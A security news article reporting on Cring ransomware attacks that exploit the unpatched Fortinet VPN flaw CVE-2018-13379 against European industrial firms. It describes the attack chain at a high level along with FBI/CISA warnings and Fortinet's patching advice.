A vulnerability in Fortinet VPNs is being exploited by a new ransomware strain dubbed Cring to breach and encrypt industrial sector companies’ networks.
Cring ransomware (also called as Crypt3r, Vjiszy1lo, Ghost, Phantom) was discovered by Amigo_A in January and spotted by the CSIRT team of Swiss telecommunications provider Swisscom.
The Cring operators insert customized Mimikatz samples, followed by CobaltStrike after gaining initial access and deploy the ransomware payloads by downloading using the legitimate Windows CertUtil certificate manager to bypass security software.
As per a report published by Kaspersky researchers, the attackers exploit Internet-exposed Fortigate SSL VPN servers unpatched against the CVE-2018-13379 vulnerability, which allows them to breach their targets’ network.
The victims of these attacks include industrial enterprises in European countries. It was reported that at least in one case, the attack resulted in a temporary shutdown of the industrial process due to servers used to control the industrial process becoming encrypted.
From the Fortinet VPN appliance, the ransomware operators move laterally on the targets’ enterprise network stealing Windows user credentials using Mimikatz to get control of the domain administrator account.
The ransomware payloads are then delivered to devices on the victims’ networks using the Cobalt Strike threat emulation framework deployed using a malicious PowerShell script.
The ransomware encrypts only certain files on the compromised devices using strong encryption algorithms (RSA-8192 + AES-128) after removing backup files and killing Microsoft Office and Oracle Database processes.
Then ransom notes are dropped warning the victims that their network was encrypted and that they have to make the payment at the earliest as the decryption key will not be kept indefinitely.
Victims have been using the ID-Ransomware service to check if their systems were hit by Cring ransomware. 30 Cring ransomware samples were submitted so far, with at least one per day since the end of January.
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) warned this week of advanced persistent threat (APT) actors scanning for Fortinet SSL VPN appliances vulnerable to CVE-2018-13379 exploits.
The joint advisory also warns of attackers enumerating servers unpatched against CVE-2020-12812 and CVE-2019-5591.
Any servers compromised during these infiltration attempts might be used in future attacks as initial access vectors to breach government or commercial organizations’ networks.
Fortinet stated that CVE-2018-13379 is an old vulnerability resolved in May 2019 and if the users have not upgraded still, must immediately implement the upgrade and mitigations.